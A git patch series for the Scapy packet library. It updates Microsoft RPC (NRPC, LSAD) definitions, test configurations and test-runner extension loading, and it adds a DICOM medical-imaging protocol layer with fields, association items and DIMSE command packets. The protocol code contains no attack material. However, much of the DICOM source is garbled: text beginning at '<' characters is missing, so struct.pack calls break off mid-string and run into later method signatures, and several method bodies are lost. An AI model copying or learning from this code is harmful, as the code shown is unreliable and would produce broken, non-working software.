size_is=lambda pkt: pkt.cIids, ptr_pack=True + "ppMIF", [], MInterfacePointer, size_is=lambda pkt: pkt.cIids, ptr_lvl=1 ), NDRIntField("status", 0), ] diff --git a/scapy/layers/msrpce/raw/ms_nrpc.py b/scapy/layers/msrpce/raw/ms_nrpc.py index 0772469ba4b..0b51a063d67 100644 --- a/scapy/layers/msrpce/raw/ms_nrpc.py +++ b/scapy/layers/msrpce/raw/ms_nrpc.py @@ -3,7 +3,7 @@ # See https://scapy.net/ for more information # Copyright (C) Gabriel Potter -# [ms-nrpc] v45.0 (Tue, 08 Jul 2025) +# [ms-nrpc] v49.0 (Mon, 09 Feb 2026) """ RPC definitions for the following interfaces: @@ -301,7 +301,6 @@ class RPC_SID_IDENTIFIER_AUTHORITY(NDRPacket): class PRPC_SID(NDRPacket): - ALIGNMENT = (4, 8) DEPORTED_CONFORMANTS = ["SubAuthority"] fields_desc = [ NDRByteField("Revision", 0), @@ -3556,7 +3555,7 @@ class DsrDeregisterDnsHostRecords_Request(NDRPacket): NDRFullPointerField(NDRConfVarStrNullFieldUtf16("DnsDomainName", "")), NDRFullPointerField(NDRPacketField("DomainGuid", GUID(), GUID)), NDRFullPointerField(NDRPacketField("DsaGuid", GUID(), GUID)), - NDRConfVarStrNullFieldUtf16("DnsHostName", ""), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("DnsHostName", "")), ] @@ -3692,7 +3691,7 @@ class PLSA_FOREST_TRUST_INFORMATION(NDRPacket): [], PLSA_FOREST_TRUST_RECORD, size_is=lambda pkt: pkt.RecordCount, - ptr_pack=True, + ptr_lvl=1, ) ), ] diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index e3a1d46a435..8afe70ad55e 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -169,6 +169,7 @@ def connect( :param timeout: (optional) the connection timeout (default 5) :param port: (optional) the port to connect to. (useful for SMB) """ + smb_kwargs.setdefault("HOST", host) if endpoint is None and interface is not None: # Figure out the endpoint using the endpoint mapper diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index bd703869e74..b4761c5b8fc 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -323,6 +323,7 @@ def parse_config_file(config_path, verb=3): "local": true, "format": "ansi", "num": null, + "extensions": [], "modules": [], "kw_ok": [], "kw_ko": [] @@ -349,6 +350,7 @@ def get_if_exist(key, default): local=get_if_exist("local", False), num=get_if_exist("num", None), modules=get_if_exist("modules", []), + extensions=get_if_exist("extensions", []), kw_ok=get_if_exist("kw_ok", []), kw_ko=get_if_exist("kw_ko", []), format=get_if_exist("format", "ansi")) @@ -996,6 +998,7 @@ def main(): GLOB_PREEXEC = "" PREEXEC_DICT = {} MODULES = [] + EXTENSIONS = [] TESTFILES = [] ANNOTATIONS_MODE = False INTERPRETER = False @@ -1048,6 +1051,7 @@ def main(): LOCAL = 1 if data.local else 0 NUM = data.num MODULES = data.modules + EXTENSIONS = data.extensions KW_OK.extend(data.kw_ok) KW_KO.extend(data.kw_ko) try: @@ -1138,6 +1142,9 @@ def main(): except ImportError as e: raise getopt.GetoptError("cannot import [%s]: %s" % (m, e)) + for ext in EXTENSIONS: + conf.exts.load(ext) + autorun_func = { Format.TEXT: scapy.autorun_get_text_interactive_session, Format.ANSI: scapy.autorun_get_ansi_interactive_session, diff --git a/test/configs/bsd.utsc b/test/configs/bsd.utsc index 912a4f7c210..583a27cc0ef 100644 --- a/test/configs/bsd.utsc +++ b/test/configs/bsd.utsc @@ -2,6 +2,8 @@ "testfiles": [ "test/*.uts", "test/scapy/layers/*.uts", + "test/scapy/layers/tls/*.uts", + "test/scapy/layers/msrpce/*.uts", "test/contrib/automotive/*.uts", "test/contrib/automotive/obd/*.uts", "test/contrib/automotive/scanner/*.uts", @@ -25,7 +27,7 @@ "test/contrib/*.uts": "load_contrib(\"%name%\")", "test/cert.uts": "load_layer(\"tls\")", "test/sslv2.uts": "load_layer(\"tls\")", - "test/tls*.uts": "load_layer(\"tls\")" + "test/scapy/layers/tls/*.uts": "load_layer(\"tls\")" }, "kw_ko": [ "linux", diff --git a/test/configs/cryptography.utsc b/test/configs/cryptography.utsc index 4963fc71438..8408f9fdb2b 100644 --- a/test/configs/cryptography.utsc +++ b/test/configs/cryptography.utsc @@ -5,7 +5,7 @@ "test/scapy/layers/ipsec.uts", "test/scapy/layers/kerberos.uts", "test/scapy/layers/ntlm.uts", - "test/scapy/layers/msnrpc.uts", + "test/scapy/layers/msrpce/msnrpc.uts", "test/scapy/layers/tls/cert.uts", "test/scapy/layers/tls/tls*.uts" ], diff --git a/test/configs/linux.utsc b/test/configs/linux.utsc index 25fbb6bd1d6..7972e1e8739 100644 --- a/test/configs/linux.utsc +++ b/test/configs/linux.utsc @@ -3,6 +3,7 @@ "test/*.uts", "test/scapy/layers/*.uts", "test/scapy/layers/tls/*.uts", + "test/scapy/layers/msrpce/*.uts", "test/contrib/*.uts", "test/tools/*.uts", "test/contrib/automotive/*.uts", diff --git a/test/configs/scapy-rpc.utsc b/test/configs/scapy-rpc.utsc new file mode 100644 index 00000000000..1d600b2b7b6 --- /dev/null +++ b/test/configs/scapy-rpc.utsc @@ -0,0 +1,9 @@ +{ + "testfiles": [ + "test/scapy/layers/dcerpc.uts", + "test/scapy/layers/msrpce/*.uts" + ], + "extensions": ["scapy-rpc"], + "breakfailed": true, + "onlyfailed": true +} diff --git a/test/configs/windows.utsc b/test/configs/windows.utsc index 468979a5ca5..2e015eb24e9 100644 --- a/test/configs/windows.utsc +++ b/test/configs/windows.utsc @@ -3,6 +3,7 @@ "test\\*.uts", "test\\scapy\\layers\\*.uts", "test\\scapy\\layers\\tls\\*.uts", + "test\\scapy\\layers\\msrpce\\*.uts", "test\\contrib\\automotive\\obd\\*.uts", "test\\contrib\\automotive\\scanner\\*.uts", "test\\contrib\\automotive\\gm\\*.uts", diff --git a/test/configs/windows2.utsc b/test/configs/windows2.utsc index a1c8e302953..de1fe81d9ed 100644 --- a/test/configs/windows2.utsc +++ b/test/configs/windows2.utsc @@ -3,6 +3,7 @@ "*.uts", "scapy\\layers\\*.uts", "scapy\\layers\\tls\\*.uts", + "scapy\\layers\\msrpce\\*.uts", "contrib\\automotive\\obd\\*.uts", "contrib\\automotive\\gm\\*.uts", "contrib\\automotive\\bmw\\*.uts", diff --git a/test/scapy/layers/msdrsr.uts b/test/scapy/layers/msrpce/msdrsr.uts similarity index 100% rename from test/scapy/layers/msdrsr.uts rename to test/scapy/layers/msrpce/msdrsr.uts diff --git a/test/scapy/layers/msrpce/mslsad.uts b/test/scapy/layers/msrpce/mslsad.uts new file mode 100644 index 00000000000..195f539dd44 --- /dev/null +++ b/test/scapy/layers/msrpce/mslsad.uts @@ -0,0 +1,38 @@ +% MS-LSAD tests + ++ [MS-LSAD] build and dissection tests + +* This files are stored in the scapy-rpc extension, but included as part of Scapy's main testing suite for consistency. + += [MS-LSAD] - Import [MS-LSAD] +~ disabled + +from scapy.layers.msrpce.raw.ms_lsad import * + += [MS-LSAD] - Build LsarEnumerateAccountsWithUserRight_Request +~ disabled + +policyHandle = NDRContextHandle(attributes=0, uuid=b'\x92\xa1*"\xc2\xc2\nJ\xaf\x0bL\xdd]C\x8c\x1a') +right = "SeAuditPrivilege" + +pkt = LsarEnumerateAccountsWithUserRight_Request( + PolicyHandle=policyHandle, + UserRight=PRPC_UNICODE_STRING( + Buffer=right, + ), +) + +assert bytes(pkt) == b'\x00\x00\x00\x00\x92\xa1*"\xc2\xc2\nJ\xaf\x0bL\xdd]C\x8c\x1a\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00 \x00 \x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00S\x00e\x00A\x00u\x00d\x00i\x00t\x00P\x00r\x00i\x00v\x00i\x00l\x00e\x00g\x00e\x00' + += [MS-LSAD] - Dissect LsarEnumerateAccountsWithUserRight_Response +~ disabled + +from scapy.layers.smb2 import WINNT_SID + +pkt = LsarEnumerateAccountsWithUserRight_Response(b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\t\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x05 \x00\x00\x00*\x02\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x05 \x00\x00\x00 \x02\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00') +information = pkt.valueof("EnumerationBuffer.Information") +assert [ + WINNT_SID(bytes(x.valueof("Sid"))).summary() + for x in information +] == ['S-1-5-9', 'S-1-5-32-554', 'S-1-5-32-544', 'S-1-5-11', 'S-1-1-0'] + diff --git a/test/scapy/layers/msnrpc.uts b/test/scapy/layers/msrpce/msnrpc.uts similarity index 100% rename from test/scapy/layers/msnrpc.uts rename to test/scapy/layers/msrpce/msnrpc.uts diff --git a/tox.ini b/tox.ini index c3a06ac726a..a013a8b9807 100644 --- a/tox.ini +++ b/tox.ini @@ -33,6 +33,7 @@ deps = cryptography coverage[toml] python-can + scapy-rpc # disabled on windows because they require c++ dependencies # brotli 1.1.0 broken https://github.com/google/brotli/issues/1072 brotli < 1.1.0 ; sys_platform != 'win32' From ded1d73d7c779099964338803ad7b366c99d6820 Mon Sep 17 00:00:00 2001 From: Tyler M Date: Mon, 9 Feb 2026 12:13:13 -0700 Subject: [PATCH 1582/1632] Add DICOM (Digital Imaging and Communications in Medicine) protocol support (#4891) --------- Co-authored-by: Nils Weiss Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com> --- scapy/contrib/dicom.py | 1649 ++++++++++++++++++++++++++++++++++++++++ test/contrib/dicom.uts | 576 ++++++++++++++ 2 files changed, 2225 insertions(+) create mode 100644 scapy/contrib/dicom.py create mode 100644 test/contrib/dicom.uts diff --git a/scapy/contrib/dicom.py b/scapy/contrib/dicom.py new file mode 100644 index 00000000000..de0558a2e38 --- /dev/null +++ b/scapy/contrib/dicom.py @@ -0,0 +1,1649 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Tyler M + +# scapy.contrib.description = DICOM (Digital Imaging and Communications in Medicine) +# scapy.contrib.status = loads + +""" +DICOM (Digital Imaging and Communications in Medicine) Protocol +Reference: DICOM PS3.8 - Network Communication Support for Message Exchange +https://dicom.nema.org/medical/dicom/current/output/html/part08.html +""" + +import logging +import socket +import struct +import time +from typing import Any, Dict, List, Optional, Tuple, Union + +from scapy.compat import Self +from scapy.packet import Packet, bind_layers +from scapy.error import Scapy_Exception +from scapy.fields import ( + BitField, + ByteEnumField, + ByteField, + ConditionalField, + Field, + FieldLenField, + IntField, + LenField, + PacketListField, + ShortField, + StrFixedLenField, + StrLenField, +) +from scapy.layers.inet import TCP +from scapy.supersocket import StreamSocket +from scapy.volatile import RandShort, RandInt, RandString + +__all__ = [ + "DICOM_PORT", + "DICOM_PORT_ALT", + "APP_CONTEXT_UID", + "DEFAULT_TRANSFER_SYNTAX_UID", + "VERIFICATION_SOP_CLASS_UID", + "CT_IMAGE_STORAGE_SOP_CLASS_UID", + "PATIENT_ROOT_QR_FIND_SOP_CLASS_UID", + "PATIENT_ROOT_QR_MOVE_SOP_CLASS_UID", + "PATIENT_ROOT_QR_GET_SOP_CLASS_UID", + "STUDY_ROOT_QR_FIND_SOP_CLASS_UID", + "STUDY_ROOT_QR_MOVE_SOP_CLASS_UID", + "STUDY_ROOT_QR_GET_SOP_CLASS_UID", + "DICOM", + "A_ASSOCIATE_RQ", + "A_ASSOCIATE_AC", + "A_ASSOCIATE_RJ", + "P_DATA_TF", + "PresentationDataValueItem", + "A_RELEASE_RQ", + "A_RELEASE_RP", + "A_ABORT", + "DICOMVariableItem", + "DICOMApplicationContext", + "DICOMPresentationContextRQ", + "DICOMPresentationContextAC", + "DICOMAbstractSyntax", + "DICOMTransferSyntax", + "DICOMUserInformation", + "DICOMMaximumLength", + "DICOMImplementationClassUID", + "DICOMAsyncOperationsWindow", + "DICOMSCPSCURoleSelection", + "DICOMImplementationVersionName", + "DICOMSOPClassExtendedNegotiation", + "DICOMSOPClassCommonExtendedNegotiation", + "DICOMUserIdentity", + "DICOMUserIdentityResponse", + "DICOMElementField", + "DICOMAETitleField", + "DICOMUIDField", + "DICOMUIDFieldRaw", + "DICOMUSField", + "DICOMULField", + "DICOMAEDIMSEField", + "DIMSEPacket", + "C_ECHO_RQ", + "C_ECHO_RSP", + "C_STORE_RQ", + "C_STORE_RSP", + "C_FIND_RQ", + "C_FIND_RSP", + "C_MOVE_RQ", + "C_MOVE_RSP", + "C_GET_RQ", + "C_GET_RSP", + "DICOMSocket", + "parse_dimse_status", + "_uid_to_bytes", + "_uid_to_bytes_raw", + "build_presentation_context_rq", + "build_user_information", +] + +log = logging.getLogger("scapy.contrib.dicom") + +DICOM_PORT = 104 +DICOM_PORT_ALT = 11112 +APP_CONTEXT_UID = "1.2.840.10008.3.1.1.1" +DEFAULT_TRANSFER_SYNTAX_UID = "1.2.840.10008.1.2" +VERIFICATION_SOP_CLASS_UID = "1.2.840.10008.1.1" +CT_IMAGE_STORAGE_SOP_CLASS_UID = "1.2.840.10008.5.1.4.1.1.2" + +PATIENT_ROOT_QR_FIND_SOP_CLASS_UID = "1.2.840.10008.5.1.4.1.2.1.1" +PATIENT_ROOT_QR_MOVE_SOP_CLASS_UID = "1.2.840.10008.5.1.4.1.2.1.2" +PATIENT_ROOT_QR_GET_SOP_CLASS_UID = "1.2.840.10008.5.1.4.1.2.1.3" +STUDY_ROOT_QR_FIND_SOP_CLASS_UID = "1.2.840.10008.5.1.4.1.2.2.1" +STUDY_ROOT_QR_MOVE_SOP_CLASS_UID = "1.2.840.10008.5.1.4.1.2.2.2" +STUDY_ROOT_QR_GET_SOP_CLASS_UID = "1.2.840.10008.5.1.4.1.2.2.3" + +PDU_TYPES = { + 0x01: "A-ASSOCIATE-RQ", + 0x02: "A-ASSOCIATE-AC", + 0x03: "A-ASSOCIATE-RJ", + 0x04: "P-DATA-TF", + 0x05: "A-RELEASE-RQ", + 0x06: "A-RELEASE-RP", + 0x07: "A-ABORT", +} + +ITEM_TYPES = { + 0x10: "Application Context", + 0x20: "Presentation Context RQ", + 0x21: "Presentation Context AC", + 0x30: "Abstract Syntax", + 0x40: "Transfer Syntax", + 0x50: "User Information", + 0x51: "Maximum Length", + 0x52: "Implementation Class UID", + 0x53: "Asynchronous Operations Window", + 0x54: "SCP/SCU Role Selection", + 0x55: "Implementation Version Name", + 0x56: "SOP Class Extended Negotiation", + 0x57: "SOP Class Common Extended Negotiation", + 0x58: "User Identity", + 0x59: "User Identity Server Response", +} + + +def _uid_to_bytes(uid: Union[str, bytes]) -> bytes: + """Convert UID to bytes with even-length padding (null byte if needed).""" + if isinstance(uid, bytes): + b_uid = uid + elif isinstance(uid, str): + b_uid = uid.encode("ascii") + else: + return b"" + if len(b_uid) % 2 != 0: + b_uid += b"\x00" + return b_uid + + +def _uid_to_bytes_raw(uid: Union[str, bytes]) -> bytes: + """Convert UID to bytes without padding.""" + if isinstance(uid, bytes): + return uid + elif isinstance(uid, str): + return uid.encode("ascii") + else: + return b"" + + +class DICOMAETitleField(StrFixedLenField): + """DICOM AE Title field - 16 bytes, space-padded per PS3.5 Section 6.2.""" + + def __init__(self, name: str, default: bytes = b"") -> None: + super(DICOMAETitleField, self).__init__(name, default, length=16) + + def i2m(self, pkt: Optional[Packet], val: Any) -> bytes: + if val is None: + val = b"" + if isinstance(val, str): + val = val.encode("ascii") + return val.ljust(16, b" ")[:16] + + def m2i(self, pkt: Optional[Packet], val: bytes) -> bytes: + return val + + def i2repr(self, pkt: Optional[Packet], val: Any) -> str: + if isinstance(val, bytes): + return val.decode("ascii", errors="replace").rstrip() + return str(val).rstrip() + + +class DICOMElementField(Field[bytes, bytes]): + """DICOM data element field with explicit tag and length encoding.""" + + __slots__ = ["tag_group", "tag_elem"] + + def __init__(self, name: str, default: Any, tag_group: int, + tag_elem: int) -> None: + self.tag_group = tag_group + self.tag_elem = tag_elem + Field.__init__(self, name, default) + + def addfield(self, pkt: Optional[Packet], s: bytes, val: Any) -> bytes: + if val is None: + val = b"" + if isinstance(val, str): + val = val.encode("ascii") + hdr = struct.pack(" Tuple[bytes, bytes]: + if len(s) < 8: + return s, b"" + tag_g, tag_e, length = struct.unpack(" str: + if isinstance(val, bytes): + try: + return val.decode("ascii").rstrip("\x00") + except UnicodeDecodeError: + return val.hex() + return repr(val) + + def randval(self) -> RandString: + return RandString(8) + + +class DICOMUIDField(DICOMElementField): + """DICOM UID element field with automatic even-length padding.""" + + def addfield(self, pkt: Optional[Packet], s: bytes, val: Any) -> bytes: + val = _uid_to_bytes(val) if val else b"" + return DICOMElementField.addfield(self, pkt, s, val) + + def i2repr(self, pkt: Optional[Packet], val: Any) -> str: + if isinstance(val, bytes): + return val.decode("ascii").rstrip("\x00") + return str(val) + + def randval(self) -> str: + from scapy.volatile import RandNum + return "1.2.3.%d.%d.%d" % ( + RandNum(1, 99999)._fix(), + RandNum(1, 99999)._fix(), + RandNum(1, 99999)._fix() + ) + + +class DICOMUIDFieldRaw(DICOMElementField): + """DICOM UID element field without automatic padding.""" + + def addfield(self, pkt: Optional[Packet], s: bytes, val: Any) -> bytes: + val = _uid_to_bytes_raw(val) if val else b"" + return DICOMElementField.addfield(self, pkt, s, val) + + +class DICOMUSField(DICOMElementField): + """DICOM Unsigned Short (US) element field.""" + + def addfield(self, pkt: Optional[Packet], s: bytes, val: int) -> bytes: + val_bytes = struct.pack(" Tuple[bytes, int]: + remain, val_bytes = DICOMElementField.getfield(self, pkt, s) + if len(val_bytes) >= 2: + return remain, struct.unpack(" str: + return "0x%04X" % val + + def randval(self) -> RandShort: + return RandShort() + + +class DICOMULField(DICOMElementField): + """DICOM Unsigned Long (UL) element field.""" + + def addfield(self, pkt: Optional[Packet], s: bytes, val: int) -> bytes: + val_bytes = struct.pack(" Tuple[bytes, int]: + remain, val_bytes = DICOMElementField.getfield(self, pkt, s) + if len(val_bytes) >= 4: + return remain, struct.unpack(" RandInt: + return RandInt() + + +class DICOMAEDIMSEField(DICOMElementField): + """DICOM AE element field for DIMSE - 16 bytes, space-padded.""" + + def addfield(self, pkt: Optional[Packet], s: bytes, val: Any) -> bytes: + if val is None: + val = b"" + if isinstance(val, str): + val = val.encode("ascii") + val = val.ljust(16, b" ")[:16] + return DICOMElementField.addfield(self, pkt, s, val) + + def i2repr(self, pkt: Optional[Packet], val: Any) -> str: + if isinstance(val, bytes): + return val.decode("ascii", errors="replace").strip() + return str(val).strip() + + +class DIMSEPacket(Packet): + """Base class for DIMSE command packets with automatic group length.""" + + GROUP_LENGTH_ELEMENT_SIZE = 12 + + def post_build(self, pkt: bytes, pay: bytes) -> bytes: + group_len = len(pkt) + header = struct.pack(" str: + return self.sprintf("C-ECHO-RQ msg_id=%message_id%") + + def hashret(self) -> bytes: + return struct.pack(" str: + return self.sprintf("C-ECHO-RSP status=%status%") + + def hashret(self) -> bytes: + return struct.pack(" int: + if isinstance(other, C_ECHO_RQ): + return self.message_id_responded == other.message_id + return 0 + + +class C_STORE_RQ(DIMSEPacket): + """C-STORE-RQ DIMSE Command for storing DICOM objects.""" + + name = "C-STORE-RQ" + fields_desc = [ + DICOMUIDField("affected_sop_class_uid", + CT_IMAGE_STORAGE_SOP_CLASS_UID, 0x0000, 0x0002), + DICOMUSField("command_field", 0x0001, 0x0000, 0x0100), + DICOMUSField("message_id", 1, 0x0000, 0x0110), + DICOMUSField("priority", 0x0002, 0x0000, 0x0700), + DICOMUSField("data_set_type", 0x0000, 0x0000, 0x0800), + DICOMUIDField("affected_sop_instance_uid", + "1.2.3.4.5.6.7.8.9", 0x0000, 0x1000), + ] + + def mysummary(self) -> str: + return self.sprintf("C-STORE-RQ msg_id=%message_id%") + + def hashret(self) -> bytes: + return struct.pack(" str: + return self.sprintf("C-STORE-RSP status=%status%") + + def hashret(self) -> bytes: + return struct.pack(" int: + if isinstance(other, C_STORE_RQ): + return self.message_id_responded == other.message_id + return 0 + + +class C_FIND_RQ(DIMSEPacket): + """C-FIND-RQ DIMSE Command for querying DICOM objects.""" + + name = "C-FIND-RQ" + fields_desc = [ + DICOMUIDField("affected_sop_class_uid", + PATIENT_ROOT_QR_FIND_SOP_CLASS_UID, 0x0000, 0x0002), + DICOMUSField("command_field", 0x0020, 0x0000, 0x0100), + DICOMUSField("message_id", 1, 0x0000, 0x0110), + DICOMUSField("priority", 0x0002, 0x0000, 0x0700), + DICOMUSField("data_set_type", 0x0000, 0x0000, 0x0800), + ] + + def mysummary(self) -> str: + return self.sprintf("C-FIND-RQ msg_id=%message_id%") + + def hashret(self) -> bytes: + return struct.pack(" str: + return self.sprintf("C-FIND-RSP status=%status%") + + def hashret(self) -> bytes: + return struct.pack(" int: + if isinstance(other, C_FIND_RQ): + return self.message_id_responded == other.message_id + return 0 + + +class C_MOVE_RQ(DIMSEPacket): + """C-MOVE-RQ DIMSE Command for retrieving DICOM objects.""" + + name = "C-MOVE-RQ" + fields_desc = [ + DICOMUIDField("affected_sop_class_uid", + PATIENT_ROOT_QR_MOVE_SOP_CLASS_UID, 0x0000, 0x0002), + DICOMUSField("command_field", 0x0021, 0x0000, 0x0100), + DICOMUSField("message_id", 1, 0x0000, 0x0110), + DICOMUSField("priority", 0x0002, 0x0000, 0x0700), + DICOMUSField("data_set_type", 0x0000, 0x0000, 0x0800), + DICOMAEDIMSEField("move_destination", b"", 0x0000, 0x0600), + ] + + def mysummary(self) -> str: + return self.sprintf("C-MOVE-RQ msg_id=%message_id%") + + def hashret(self) -> bytes: + return struct.pack(" str: + return self.sprintf("C-MOVE-RSP status=%status%") + + def hashret(self) -> bytes: + return struct.pack(" int: + if isinstance(other, C_MOVE_RQ): + return self.message_id_responded == other.message_id + return 0 + + +class C_GET_RQ(DIMSEPacket): + """C-GET-RQ DIMSE Command for retrieving objects on same association.""" + + name = "C-GET-RQ" + fields_desc = [ + DICOMUIDField("affected_sop_class_uid", + PATIENT_ROOT_QR_GET_SOP_CLASS_UID, 0x0000, 0x0002), + DICOMUSField("command_field", 0x0010, 0x0000, 0x0100), + DICOMUSField("message_id", 1, 0x0000, 0x0110), + DICOMUSField("priority", 0x0002, 0x0000, 0x0700), + DICOMUSField("data_set_type", 0x0000, 0x0000, 0x0800), + ] + + def mysummary(self) -> str: + return self.sprintf("C-GET-RQ msg_id=%message_id%") + + def hashret(self) -> bytes: + return struct.pack(" str: + return self.sprintf("C-GET-RSP status=%status%") + + def hashret(self) -> bytes: + return struct.pack(" int: + if isinstance(other, C_GET_RQ): + return self.message_id_responded == other.message_id + return 0 + + +def parse_dimse_status(dimse_bytes: bytes) -> Optional[int]: + """Extract status code from DIMSE response bytes.""" + try: + if len(dimse_bytes) < 12: + return None + cmd_group_len = struct.unpack(" len(dimse_bytes) or offset + 10 > group_end_offset: + break + return struct.unpack( + " Tuple[bytes, bytes]: + return b"", s + + +class DICOMVariableItem(Packet): + """DICOM variable item header with type and length fields.""" + + name = "DICOM Variable Item" + fields_desc = [ + ByteEnumField("item_type", 0x10, ITEM_TYPES), + ByteField("reserved", 0), + LenField("length", None, fmt="!H"), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + if self.length is not None: + if len(s) < self.length: + raise Scapy_Exception("PDU payload incomplete") + return s[:self.length], s[self.length:] + return s, b"" + + def guess_payload_class(self, payload: bytes) -> type: + type_to_class = { + 0x10: DICOMApplicationContext, + 0x20: DICOMPresentationContextRQ, + 0x21: DICOMPresentationContextAC, + 0x30: DICOMAbstractSyntax, + 0x40: DICOMTransferSyntax, + 0x50: DICOMUserInformation, + 0x51: DICOMMaximumLength, + 0x52: DICOMImplementationClassUID, + 0x53: DICOMAsyncOperationsWindow, + 0x54: DICOMSCPSCURoleSelection, + 0x55: DICOMImplementationVersionName, + 0x56: DICOMSOPClassExtendedNegotiation, + 0x57: DICOMSOPClassCommonExtendedNegotiation, + 0x58: DICOMUserIdentity, + 0x59: DICOMUserIdentityResponse, + } + return type_to_class.get(self.item_type, DICOMGenericItem) + + def mysummary(self) -> str: + return self.sprintf("Item %item_type%") + + +class DICOMApplicationContext(Packet): + """DICOM Application Context item.""" + + name = "DICOM Application Context" + fields_desc = [ + StrLenField( + "uid", _uid_to_bytes(APP_CONTEXT_UID), + length_from=lambda pkt: ( + pkt.underlayer.length + if pkt.underlayer and pkt.underlayer.length + else len(pkt.uid) + ) + ), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + return "AppContext %s" % self.uid.decode("ascii").rstrip("\x00") + + +class DICOMAbstractSyntax(Packet): + """DICOM Abstract Syntax item.""" + + name = "DICOM Abstract Syntax" + fields_desc = [ + StrLenField( + "uid", b"", + length_from=lambda pkt: ( + pkt.underlayer.length + if pkt.underlayer and pkt.underlayer.length + else len(pkt.uid) + ) + ), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + return "AbstractSyntax %s" % self.uid.decode("ascii").rstrip("\x00") + + +class DICOMTransferSyntax(Packet): + """DICOM Transfer Syntax item.""" + + name = "DICOM Transfer Syntax" + fields_desc = [ + StrLenField( + "uid", _uid_to_bytes(DEFAULT_TRANSFER_SYNTAX_UID), + length_from=lambda pkt: ( + pkt.underlayer.length + if pkt.underlayer and pkt.underlayer.length + else len(pkt.uid) + ) + ), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + return "TransferSyntax %s" % self.uid.decode("ascii").rstrip("\x00") + + +class DICOMPresentationContextRQ(Packet): + """DICOM Presentation Context item for association requests.""" + + name = "DICOM Presentation Context RQ" + fields_desc = [ + ByteField("context_id", 1), + ByteField("reserved1", 0), + ByteField("reserved2", 0), + ByteField("reserved3", 0), + PacketListField( + "sub_items", [], + DICOMVariableItem, + max_count=64, + length_from=lambda pkt: ( + pkt.underlayer.length - 4 + if pkt.underlayer and pkt.underlayer.length + else 0 + ) + ), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + return "PresentationContext-RQ ctx_id=%d" % self.context_id + + +class DICOMPresentationContextAC(Packet): + """DICOM Presentation Context item for association accepts.""" + + name = "DICOM Presentation Context AC" + + RESULT_CODES = { + 0: "acceptance", + 1: "user-rejection", + 2: "no-reason", + 3: "abstract-syntax-not-supported", + 4: "transfer-syntaxes-not-supported", + } + + fields_desc = [ + ByteField("context_id", 1), + ByteField("reserved1", 0), + ByteEnumField("result", 0, RESULT_CODES), + ByteField("reserved2", 0), + PacketListField( + "sub_items", [], + DICOMVariableItem, + max_count=8, + length_from=lambda pkt: ( + pkt.underlayer.length - 4 + if pkt.underlayer and pkt.underlayer.length + else 0 + ) + ), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + return self.sprintf( + "PresentationContext-AC ctx_id=%context_id% result=%result%" + ) + + +class DICOMMaximumLength(Packet): + """DICOM Maximum Length sub-item.""" + + name = "DICOM Maximum Length" + fields_desc = [ + IntField("max_pdu_length", 16384), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + return "MaxLength %d" % self.max_pdu_length + + +class DICOMImplementationClassUID(Packet): + """DICOM Implementation Class UID sub-item.""" + + name = "DICOM Implementation Class UID" + fields_desc = [ + StrLenField( + "uid", b"", + length_from=lambda pkt: ( + pkt.underlayer.length + if pkt.underlayer and pkt.underlayer.length + else len(pkt.uid) + ) + ), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + return "ImplClassUID %s" % self.uid.decode("ascii").rstrip("\x00") + + +class DICOMImplementationVersionName(Packet): + """DICOM Implementation Version Name sub-item.""" + + name = "DICOM Implementation Version Name" + fields_desc = [ + StrLenField( + "name", b"", + length_from=lambda pkt: ( + pkt.underlayer.length + if pkt.underlayer and pkt.underlayer.length + else len(pkt.name) + ) + ), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + return "ImplVersion %s" % self.name.decode("ascii").rstrip("\x00") + + +class DICOMAsyncOperationsWindow(Packet): + """DICOM Asynchronous Operations Window sub-item.""" + + name = "DICOM Async Operations Window" + fields_desc = [ + ShortField("max_ops_invoked", 1), + ShortField("max_ops_performed", 1), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + return "AsyncOps inv=%d perf=%d" % ( + self.max_ops_invoked, self.max_ops_performed + ) + + +class DICOMSCPSCURoleSelection(Packet): + 